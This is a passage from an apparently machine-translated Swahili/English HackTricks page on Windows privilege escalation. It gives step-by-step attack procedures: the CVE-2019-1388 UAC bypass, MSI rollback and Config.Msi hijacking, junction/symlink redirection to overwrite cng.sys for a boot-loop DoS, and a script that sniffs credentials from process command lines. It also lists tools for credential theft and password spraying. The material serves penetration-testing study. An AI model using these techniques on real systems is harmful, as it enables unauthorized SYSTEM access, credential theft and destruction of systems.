InitContextinayodhibitiwa na mwizi kutokaInitializekwenye handle hiyo. Sajili line app kwaLRegisterRequestRecipient(Req_Func 61), chocheaTRequestMakeCall(Req_Func 121), chukua kupitiaGetAsyncEvents(Req_Func 0), kisha unregister/shutdown ili kurudia uandishi wa deterministic. - Jiweke kwenye
[TapiAdministrators]katikaC:\Windows\TAPI\tsec.ini, ungana tena, kisha waitiGetUIDllNamena njia ya DLL yoyote ili kutekelezaTSPI_providerUIIdentifykamaNETWORK SERVICE.
More details:
Telephony Tapsrv Arbitrary Dword Write To Rce
Mengine
File Extensions that could execute stuff in Windows
Angalia ukurasa https://filesec.io/
Protocol handler / ShellExecute abuse via Markdown renderers
Viungo vya Markdown vinavyoweza kubonyezwa vinavyotumwa kwa ShellExecuteExW vinaweza kuanzisha URI handlers hatarishi (file:, ms-appinstaller: au mfumo wowote uliosajiliwa) na kuendesha faili zinazodhibitiwa na mshambuliaji kama mtumiaji wa sasa. Tazama:
Protocol Handler Shell Execute Abuse
Kufuatilia Command Lines kwa nyaraka za kuingia
Unapopata shell kama mtumiaji, kunaweza kuwa na scheduled tasks au michakato mingine inayotekelezwa ambayo hupitisha credentials kwenye command line. Skripti hapa chini inakamata command lines za michakato kila sekunde mbili na inalinganisha hali ya sasa na hali ya awali, ikitoa tofauti zozote.
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
Stealing passwords from processes
From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
Ikiwa una ufikiaji wa kiolesura cha picha (kupitia console au RDP) na UAC imewezeshwa, katika baadhi ya matoleo ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama “NT\AUTHORITY SYSTEM” kutoka kwa mtumiaji asiye na vibali.
Hii inafanya iwezekane kuinua vibali na bypass UAC wakati huo huo kwa udhaifu huo uleule. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato, imewekwa saini na kutolewa na Microsoft.
Baadhi ya mifumo iliyoathiriwa ni zifuatazo:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
Kutoka Administrator Medium to High Integrity Level / UAC Bypass
Soma hii ili kujifunza kuhusu Integrity Levels:
Kisha soma hii ili kujifunza kuhusu UAC na UAC bypasses:
Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP
The technique described in this blog post with a exploit code available here.
The attack basically consist of abusing the Windows Installer’s rollback feature to replace legitimate files with malicious ones during the uninstallation process. For this the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by he Windows Installer to store rollback files during the uninstallation of other MSI packages where the rollback files would have been modified to contain the malicious payload.
The summarized technique is the following:
- Stage 1 – Preparing for the Hijack (leave
C:\Config.Msiempty)
-
Step 1: Install the MSI
-
Create an
.msithat installs a harmless file (e.g.,dummy.txt) in a writable folder (TARGETDIR). -
Mark the installer as “UAC Compliant”, so a non-admin user can run it.
-
Keep a handle open to the file after install.
-
Step 2: Begin Uninstall
-
Uninstall the same
.msi. -
The uninstall process starts moving files to
C:\Config.Msiand renaming them to.rbffiles (rollback backups). -
Poll the open file handle using
GetFinalPathNameByHandleto detect when the file becomesC:\Config.Msi\<random>.rbf. -
Step 3: Custom Syncing
-
The
.msiincludes a custom uninstall action (SyncOnRbfWritten) that: -
Signals when
.rbfhas been written. -
Then waits on another event before continuing the uninstall.
-
Step 4: Block Deletion of
.rbf -
When signaled, open the
.rbffile withoutFILE_SHARE_DELETE— this prevents it from being deleted. -
Then signal back so the uninstall can finish.
-
Windows Installer fails to delete the
.rbf, and because it can’t delete all contents,C:\Config.Msiis not removed. -
Step 5: Manually Delete
.rbf -
You (attacker) delete the
.rbffile manually. -
Now
C:\Config.Msiis empty, ready to be hijacked.
At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete
C:\Config.Msi.
- Stage 2 – Replacing Rollback Scripts with Malicious Ones
-
Step 6: Recreate
C:\Config.Msiwith Weak ACLs -
Recreate the
C:\Config.Msifolder yourself. -
Set weak DACLs (e.g., Everyone:F), and keep a handle open with
WRITE_DAC. -
Step 7: Run Another Install
-
Install the
.msiagain, with: -
TARGETDIR: Writable location. -
ERROROUT: A variable that triggers a forced failure. -
This install will be used to trigger rollback again, which reads
.rbsand.rbf. -
Step 8: Monitor for
.rbs -
Use
ReadDirectoryChangesWto monitorC:\Config.Msiuntil a new.rbsappears. -
Capture its filename.
-
Step 9: Sync Before Rollback
-
The
.msicontains a custom install action (SyncBeforeRollback) that: -
Signals an event when the
.rbsis created. -
Then waits before continuing.
-
Step 10: Reapply Weak ACL
-
After receiving the
.rbs createdevent: -
The Windows Installer reapplies strong ACLs to
C:\Config.Msi. -
But since you still have a handle with
WRITE_DAC, you can reapply weak ACLs again.
ACLs are only enforced on handle open, so you can still write to the folder.
-
Step 11: Drop Fake
.rbsand.rbf -
Overwrite the
.rbsfile with a fake rollback script that tells Windows to: -
Restore your
.rbffile (malicious DLL) into a privileged location (e.g.,C:\Program Files\Common Files\microsoft shared\ink\HID.DLL). -
Drop your fake
.rbfcontaining a malicious SYSTEM-level payload DLL. -
Step 12: Trigger the Rollback
-
Signal the sync event so the installer resumes.
-
A type 19 custom action (
ErrorOut) is configured to intentionally fail the install at a known point. -
This causes rollback to begin.
-
Step 13: SYSTEM Installs Your DLL
-
Windows Installer:
-
Reads your malicious
.rbs. -
Copies your
.rbfDLL into the target location. -
You now have your malicious DLL in a SYSTEM-loaded path.
-
Final Step: Execute SYSTEM Code
-
Run a trusted auto-elevated binary (e.g.,
osk.exe) that loads the DLL you hijacked. -
Boom: Your code is executed as SYSTEM.
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion ?
You could exploit NTFS internals: every folder has a hidden alternate data stream called:
C:\SomeFolder::$INDEX_ALLOCATION
Mtiririko huu huhifadhi metadata ya index ya folda.
Kwa hivyo, ikiwa uifuta mtiririko ::$INDEX_ALLOCATION ya folda, NTFS inafuta folda nzima kutoka kwa mfumo wa faili.
Unaweza kufanya hivi kwa kutumia APIs za kawaida za kufuta faili kama:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Ingawa unawaita API ya file delete, hiyo huifuta folder yenyewe.
Kutoka Folder Contents Delete hadi SYSTEM EoP
Je, vipi ikiwa primitive yako haiwezi kuruhusu ku-delete files/folders kwa hiari, lakini inaweza kuruhusu deletion ya contents ya attacker-controlled folder?
- Hatua 1: Andaa bait folder na file
- Create:
C:\temp\folder1 - Inside it:
C:\temp\folder1\file1.txt
- Hatua 2: Weka an oplock kwenye
file1.txt
- The oplock inasitisha utekelezaji wakati mchakato mwenye ruhusa unapo jaribu ku-delete
file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- Hatua 3: Chochea mchakato wa SYSTEM (kwa mfano,
SilentCleanup)
- Mchakato huu hupitia folda (kwa mfano,
%TEMP%) na hujaribu kufuta yaliyomo ndani yao. - Inapofika kwenye
file1.txt, oplock inasababisha na inakabidhi udhibiti kwa callback yako.
- Hatua 4: Ndani ya oplock callback – welekeza ufutaji
-
Chaguo A: Hamisha
file1.txtmahali pengine -
Hii inafanya
folder1kuwa tupu bila kuvunja oplock. -
Usifute
file1.txtmoja kwa moja — hilo litaachilia oplock mapema. -
Chaguo B: Geuza
folder1kuwa junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
- Chaguo C: Unda symlink katika
\RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
Hii inalenga mtiririko wa ndani wa NTFS ambao huhifadhi metadata ya folda — kuifuta kunasababisha kufutwa kwa folda.
- Hatua 5: Acha oplock
- Mchakato wa SYSTEM unaendelea na unajaribu kufuta
file1.txt. - Lakini sasa, kutokana na junction + symlink, kwa kweli inaifuta:
C:\Config.Msi::$INDEX_ALLOCATION
Result: C:\Config.Msi imefutwa na SYSTEM.
Kutoka Kuunda Folda Yeyote hadi DoS ya Kudumu
Tumia primitive inayokuruhusu kuunda folda yeyote kama SYSTEM/admin — hata kama huwezi kuandika mafaili au kusanidi ruhusa dhaifu.
Tengeneza folda (si faili) yenye jina la critical Windows driver, kwa mfano:
C:\Windows\System32\cng.sys
- Njia hii kwa kawaida inalingana na dereva ya kernel-mode
cng.sys. - Ikiwa utainda kabla kama folda, Windows haitafanikiwa kupakia dereva halisi wakati wa uzinduzi.
- Kisha, Windows inajaribu kupakia
cng.syswakati wa uzinduzi. - Inapoiona folda, inashindwa kutambua dereva halisi, na inaanguka au kusimamisha uzinduzi.
- Hakuna njia mbadala, na hakuna urejeshaji bila hatua za nje (mf., matengenezo ya uzinduzi au upatikanaji wa diski).
Kutoka kwenye njia za log/backup za wenye ruhusa + OM symlinks hadi kuandika upya faili kiholela / boot DoS
Wakati huduma yenye ruhusa inaandika logs/exports kwa njia inayosomwa kutoka kwa config inayoweza kuandikwa, ujaribu kupeleka njia hiyo kwa Object Manager symlinks + NTFS mount points ili kubadilisha uandishi wa huduma yenye ruhusa kuwa kuandika upya faili kiholela (hata bila SeCreateSymbolicLinkPrivilege).
Mahitaji
- Config inayohifadhi njia lengwa inaweza kuandikwa na mshambuliaji (mf.,
%ProgramData%\...\.ini). - Uwezo wa kuunda mount point kwa
\RPC Controlna OM file symlink (James Forshaw symboliclink-testing-tools). - Operesheni yenye ruhusa inayoiandika kwenye njia hiyo (log, export, report).
Mfano wa mnyororo
- Soma config ili kupata mahali pa log la mwenye ruhusa, kwa mfano
SMSLogFile=C:\users\iconics_user\AppData\Local\Temp\logs\log.txtkatikaC:\ProgramData\ICONICS\IcoSetup64.ini. - Redirect the path without admin:
mkdir C:\users\iconics_user\AppData\Local\Temp\logs
CreateMountPoint C:\users\iconics_user\AppData\Local\Temp\logs \RPC Control
CreateSymlink "\\RPC Control\\log.txt" "\\??\\C:\\Windows\\System32\\cng.sys"
- Subiri sehemu yenye hadhi ya juu iandike log (mfano, admin anachochea “tuma SMS ya majaribio”). Uandishi sasa unaingia katika
C:\Windows\System32\cng.sys. - Chunguza lengo lililobadilishwa (hex/PE parser) kuthibitisha uharibifu; reboot inalazimisha Windows kupakia path ya driver iliyobadilishwa → boot loop DoS. Hii pia inatumika kwa faili yoyote iliyolindwa ambayo huduma yenye ruhusa itaifungua kwa ajili ya kuandika.
cng.syskawaida hupakiwa kutokaC:\Windows\System32\drivers\cng.sys, lakini ikiwa nakala ipo katikaC:\Windows\System32\cng.sysinaweza kujaribiwa kwanza, ikifanya kuwa DoS sink inayotegemewa kwa data iliyochafuliwa.
Kutoka High Integrity hadi SYSTEM
Huduma mpya
Ikiwa tayari unaendesha kwenye mchakato wa High Integrity, njia hadi SYSTEM inaweza kuwa rahisi kwa kuunda na kutekeleza huduma mpya:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
Tip
Wakati wa kuunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwa kuwa itauliwa ndani ya sekunde 20 ikiwa si service halali.
AlwaysInstallElevated
Kutoka kwenye High Integrity process unaweza kujaribu kuwezesha the AlwaysInstallElevated registry entries na kufunga reverse shell kwa kutumia .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
Unaweza find the code here.
From SeDebug + SeImpersonate to Full Token privileges
Ikiwa una hizo token privileges (inawezekana utaziona kwenye process ambayo tayari ni High Integrity), utaweza kufungua karibu mchakato wowote (si protected processes) kwa kutumia SeDebug privilege, kunakili the token ya mchakato, na kuunda mchakato wowote kwa kutumia token hiyo.
Mbinu hii kawaida inahusisha kuchagua mchakato unaoendesha kama SYSTEM mwenye token privileges zote (ndio, unaweza kupata SYSTEM processes bila token privileges zote).
Unaweza kupata example of code executing the proposed technique here.
Named Pipes
Mbinu hii inatumiwa na meterpreter kupanda kiwango kwa getsystem. Mbinu inajumuisha kuunda pipe kisha kuunda/kutumia vibaya service ili kuandika kwenye pipe hiyo. Kisha, server aliyekuunda pipe kwa kutumia SeImpersonate privilege ataweza kuigiza the token ya mteja wa pipe (service) na kupata SYSTEM privileges.
Ikiwa ungependa learn more about name pipes you should read this.
Ikiwa unataka kusoma mfano wa how to go from high integrity to System using name pipes you should read this.
Dll Hijacking
Ikiwa utafanikiwa hijack a dll inayopakiwa na process inayokimbia kama SYSTEM, utaweza kutekeleza code yoyote kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na zaidi, ni rahisi zaidi kufanikiwa kutoka kwenye high integrity process kwani itakuwa na write permissions kwenye folda zinazotumika kupakia dlls.
Unaweza learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Soma: https://github.com/itm4n/FullPowers
More help
Useful tools
Chombo bora kutafuta Windows local privilege escalation vectors: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc(PowerUP) – Huchunguza misconfigurations na faili nyeti (check here). Detected.
JAWS – Huchunguza baadhi ya misconfigurations zinazowezekana na kukusanya taarifa (check here).
privesc – Huchunguza misconfigurations
SessionGopher – Hutoka PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP saved session information. Tumia -Thorough kwa lokal.
Invoke-WCMDump – Huteka crendentials kutoka Credential Manager. Detected.
DomainPasswordSpray – Inasambaza passwords zilizokusanywa kote kwenye domain
Inveigh – Inveigh ni PowerShell ADIDNS/LLMNR/mDNS spoofer na man-in-the-middle tool.
WindowsEnum – Enumeration ya msingi ya privesc WindowsSherlock ~~~~ – Tafuta privesc vulnerabilities zilizoithibitishwa (DEPRECATED kwa Watson)WINspect – Local checks (Inahitaji Admin rights)
Exe
Watson – Tafuta privesc vulnerabilities zilizojulikana (inahitaji kucompile kwa VisualStudio) (precompiled)
SeatBelt – Huorodhesha host kutafuta misconfigurations (zaidi ni chombo cha kukusanya taarifa kuliko privesc) (inahitaji kucompile) (precompiled)
LaZagne – Huteka credentials kutoka kwa programu nyingi (exe precompiled kwenye github)
SharpUP – Port ya PowerUp kwa C#Beroot ~~~~ – Huchunguza misconfiguration (executable precompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.Windows-Privesc-Check – Huchunguza misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.
Bat
winPEASbat – Chombo kilichotengenezwa kulingana na post hii (hakihitaji accesschk ili kifanye kazi vizuri lakini kinaweza kukitumia).
Local
Windows-Exploit-Suggester – Husoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python lokal)
Windows Exploit Suggester Next Generation – Husoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python lokal)
Meterpreter
multi/recon/local_exploit_suggestor
Unahitaji kucompile project kwa kutumia toleo sahihi la .NET (see this). Ili kuona toleo la .NET lililowekwa kwenye host la mwathiri unaweza kufanya:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
Marejeo
-
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
-
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
-
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-
https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
-
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
-
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
-
HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft
-
Check Point Research – Chasing the Silver Fox: Cat & Mouse in Kernel Shadows
-
Unit 42 – Privileged File System Vulnerability Present in a SCADA System
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.